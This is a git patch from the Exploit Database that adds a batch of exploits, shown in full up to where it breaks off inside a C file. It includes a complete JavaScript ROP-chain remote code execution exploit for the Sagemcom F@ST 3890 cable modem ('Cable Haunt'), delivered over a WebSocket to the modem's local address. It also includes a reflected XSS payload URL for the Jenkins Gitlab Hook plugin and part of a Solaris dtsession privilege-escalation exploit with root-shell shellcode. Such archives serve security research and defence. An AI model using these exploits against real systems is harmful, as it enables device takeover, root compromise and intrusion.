From 1a9ce31a5f0bd8a9a5cbe527dcbe548c307ad054 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 17 Jan 2020 05:02:10 +0000 Subject: [PATCH] DB: 2020-01-17 12 changes to exploits/shellcodes SunOS 5.10 Generic_147148-26 - Local Privilege Escalation Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP) Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting VICIDIAL Call Center Suite - Multiple SQL Injections Online Book Store 1.0 - 'bookisbn' SQL Injection WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting Online Book Store 1.0 - Arbitrary File Upload Tautulli 2.1.9 - Denial of Service ( Metasploit ) Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection --- exploits/hardware/remote/47936.js | 431 +++++++++++++++ exploits/java/webapps/47927.txt | 9 + exploits/multiple/local/47932.c | 291 ++++++++++ exploits/multiple/webapps/47929.rb | 38 ++ exploits/multiple/webapps/47930.txt | 130 +++++ exploits/php/webapps/47925.txt | 85 +++ exploits/php/webapps/47926.txt | 45 ++ exploits/php/webapps/47928.txt | 22 + exploits/php/webapps/47931.txt | 48 ++ exploits/php/webapps/47934.txt | 57 ++ exploits/windows/local/47933.rb | 23 + exploits/windows_x86-64/local/47935.cpp | 707 ++++++++++++++++++++++++ files_exploits.csv | 22 +- 13 files changed, 1903 insertions(+), 5 deletions(-) create mode 100644 exploits/hardware/remote/47936.js create mode 100644 exploits/java/webapps/47927.txt create mode 100644 exploits/multiple/local/47932.c create mode 100755 exploits/multiple/webapps/47929.rb create mode 100644 exploits/multiple/webapps/47930.txt create mode 100644 exploits/php/webapps/47925.txt create mode 100644 exploits/php/webapps/47926.txt create mode 100644 exploits/php/webapps/47928.txt create mode 100644 exploits/php/webapps/47931.txt create mode 100644 exploits/php/webapps/47934.txt create mode 100755 exploits/windows/local/47933.rb create mode 100644 exploits/windows_x86-64/local/47935.cpp diff --git a/exploits/hardware/remote/47936.js b/exploits/hardware/remote/47936.js new file mode 100644 index 000000000..19621f8ef --- /dev/null +++ b/exploits/hardware/remote/47936.js @@ -0,0 +1,431 @@ +// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47936.zip + +function buf2hex(buffer) { // buffer is an ArrayBuffer + return Array.prototype.map.call(new Uint8Array(buffer), x => ('00' + x.toString(16)).slice(-2)).join(''); +} + +function insertAt(arr, index, toInsert) { + for(let i = 0; i < toInsert.length; i++) { + arr[i+index]= toInsert[i]; + } +} + +function testEqual(buf1, buf2) +{ + if (buf1.byteLength != buf2.byteLength) return false; + var dv1 = new Int8Array(buf1); + var dv2 = new Int8Array(buf2); + for (var i = 0 ; i != buf1.byteLength ; i++) + { + if (dv1[i] != dv2[i]) return false; + } + return true; +} + +arr = new Uint8Array(0xd00); + +arr.fill(0x41) + +firstSp = 0x00 +previousSp = firstSp +sp = previousSp+0xa0 +insertAt(arr, previousSp+0x84-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) +insertAt(arr, previousSp+0x94-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) +// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20; + +previousSp = sp +sp = previousSp+0x20 +insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) +//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xc2, 0x80, 0x14, 0x27, 0x10]) +//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xf2, 0x80, 0x8a, 0x89, 0x7c]) +insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) +//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30; + +previousSp = sp +sp = previousSp+0x30 +insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call Socket + +//0x80a05b20 +socketAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x20] + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, socketAddr) //set s0 = socketAddr +insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) +//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20; + +//0x80a05a30; +serverAddr = [0xe2, 0x80, 0xa0, 0x5a, 0x30]; + +previousSp = sp +sp = previousSp+0x20 +insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr +insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp + 0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x48, 0x71, 0x6c]) +//0x8048716c: move $a0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp + 0x10 +insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x87, 0x9e, 0x68]) +//0x80879e68: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp + 0x10 +insertAt(arr, previousSp-1, [0xe2, 0x80, 0x83, 0xd9, 0xb8]) +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18]) +//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44]) +//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call memset + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp, [0x41, 0x2, 0x5, 0x39]) //set s0 = port +insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +// previousSp = sp +// sp = previousSp+0x10 +// insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) +// //0x80787f64: jalr $s5; nop; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr +insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, sp-1, socketAddr) +insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) +//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20; +//store port + +// previousSp = sp +// sp = previousSp+0x20 +// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) +// //0x80787f64: jalr $s5; nop; + +socketAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x1c] + +previousSp = sp +sp = previousSp+0x20 +insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4 +insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) +//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) +//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp+0x4-1, serverAddr) //set s1 = server +insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8]) +//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp + 0x10 +insertAt(arr, previousSp-1, [0xe2, 0x80, 0x8a, 0x62, 0x4c]) +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18]) +//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44]) +//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call bind + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) +//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) +//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) +//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x91, 0x20]) //set s0 = listen - 0x +insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) +//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30; + +previousSp = sp +sp = previousSp+0x30 +insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call listen + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) +//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) +//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xc2, 0x80, 0x8, 0x40, 0x8]) +//0x80084008: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, [0xe2, 0x80, 0x8a, 0xd8, 0x84]) //set s0 = accept +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x14, 0x27, 0x10]) +//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call accept + +//0x80a05b24 +clientAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x24] + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, clientAddr) //set s0 = clientAddr +insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) +//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20; + + +// previousSp = sp +// sp = previousSp+0x20 +// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) +// //0x80787f64: jalr $s5; nop; + +clientAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x20] + +previousSp = sp +sp = previousSp+0x20 +insertAt(arr, sp-1, clientAddrM4) //set s0 = clientAddr - 4 +insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) +//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) +//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xc2, 0x80, 0x4c, 0x10, 0x38]) +//0x804c1038: addiu $a2, $zero, 0x400; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +//0x80a05c30 +payloadAddr = [0xe2, 0x80, 0xa0, 0x5c, 0x30] + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp+0x4-1, payloadAddr) //set s1 = payload +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8]) +//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x46, 0x73, 0x68]) +//0x80467368: move $a3, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x93, 0x3c]) //set s0 = recv - 0x +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) +//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30; + +previousSp = sp +sp = previousSp+0x30 +insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call recv + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) +// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20; + +previousSp = sp +sp = previousSp+0x20 +insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x12, 0x3b, 0x7c]) +//0x80123b7c: addiu $a0, $a0, 4; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0xab, 0x5c]) //set s0 = sleep +insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call sleep + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, payloadAddr) //set s0 = payload +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +var string = new TextDecoder("utf-8").decode(arr); + +var newArr = new TextEncoder("utf-8").encode(string); + +console.log(buf2hex(newArr)); + +exploit = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":' + string + ',"fStopHz":1000000000,"fftSize":1024,"gain":1},"id":"0"}' +console.log(exploit) + +console.log(testEqual(arr, newArr)); + +var socket = new WebSocket("ws://spectrum:spectrum@192.168.100.1:6080/Frontend", 'rpc-frontend') + +socket.onopen = function(e) { + socket.send(exploit) + fetch('/payload') +}; \ No newline at end of file diff --git a/exploits/java/webapps/47927.txt b/exploits/java/webapps/47927.txt new file mode 100644 index 000000000..5430836dd --- /dev/null +++ b/exploits/java/webapps/47927.txt @@ -0,0 +1,9 @@ +# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting +# Exploit Author: Ai Ho +# Vendor Homepage : https://jenkins.io/ +# Effective version : Gitlab Hook Plugin 1.4.2 and earlier +# References: https://jenkins.io/security/advisory/2020-01-15/ +# CVE: CVE-2020-2096 + +# PoC: +http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E \ No newline at end of file diff --git a/exploits/multiple/local/47932.c b/exploits/multiple/local/47932.c new file mode 100644 index 000000000..2714b3840 --- /dev/null +++ b/exploits/multiple/local/47932.c @@ -0,0 +1,291 @@ +# Exploit: SunOS 5.10 Generic_147148-26 - Local Privilege Escalation +# Date: 2020-01-15 +# Author: Marco Ivaldi +# Vendor: www.oracle.com +# Software Link: https://www.oracle.com/technetwork/server-storage/solaris10/downloads/latest-release/index.html +# CVE: CVE-2020-2696 + +/* + * raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel + * Copyright (c) 2019-2020 Marco Ivaldi + * + * A buffer overflow in the CheckMonitor() function in the Common Desktop + * Environment 2.3.1 and earlier and 1.6 and earlier, as distributed with + * Oracle Solaris 10 1/13 (Update 11) and earlier, allows local users to gain + * root privileges via a long palette name passed to dtsession in a malicious + * .Xdefaults file (CVE-2020-2696). + * + * "I always loved Sun because it was so easy to own. Now with Solaris 11 I + * don't like it anymore." -- ~B. + * + * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack + * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory + * space, try returning to sprintf() instead of strcpy(). + * + * I haven't written a Solaris/SPARC version because I don't have a SPARC box + * on which Solaris 10 can run. If anybody is kind enough to give me access to + * such a box, I'd be happy to port my exploit to Solaris/SPARC as well. + * + * Usage: + * $ gcc raptor_dtsession_ipa.c -o raptor_dtsession_ipa -Wall + * [on your xserver: disable the access control] + * $ ./raptor_dtsession_ipa 192.168.1.1:0 + * [...] + * # id + * uid=0(root) gid=1(other) + * # + * + * Tested on: + * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13) + * [previous Solaris versions are also likely vulnerable] + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define INFO1 "raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel" +#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi " + +#define VULN "/usr/dt/bin/dtsession" // the vulnerable program +#define BUFSIZE 256 // size of the palette name +#define PADDING 3 // padding in the palette name +#define PAYSIZE 1024 // size of the payload +#define OFFSET env_len / 2 // offset to the shellcode + +char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */ +/* double setuid() */ +"\x31\xc0\x50\x50\xb0\x17\xcd\x91" +"\x31\xc0\x50\x50\xb0\x17\xcd\x91" +/* execve() */ +"\x31\xc0\x50\x68/ksh\x68/bin" +"\x89\xe3\x50\x53\x89\xe2\x50" +"\x52\x53\xb0\x3b\x50\xcd\x91"; + +/* globals */ +char *env[256]; +int env_pos = 0, env_len = 0; + +/* prototypes */ +int add_env(char *string); +void check_zero(int addr, char *pattern); +int search_ldso(char *sym); +int search_rwx_mem(void); +void set_val(char *buf, int pos, int val); + +/* + * main() + */ +int main(int argc, char **argv) +{ + char buf[BUFSIZE], payload[PAYSIZE]; + char platform[256], release[256], display[256]; + int i, payaddr; + + char *arg[2] = {"foo", NULL}; + int sb = ((int)argv[0] | 0xfff); /* stack base */ + int ret = search_ldso("strcpy"); /* or sprintf */ + int rwx_mem = search_rwx_mem(); /* rwx memory */ + + FILE *fp; + char palette_file[BUFSIZE + 18]; + + /* print exploit information */ + fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); + + /* read command line */ + if (argc != 2) { + fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]); + exit(1); + } + sprintf(display, "DISPLAY=%s", argv[1]); + + /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */ + memset(payload, '\x90', PAYSIZE); + payload[PAYSIZE - 1] = 0x0; + memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc)); + + /* fill the envp, keeping padding 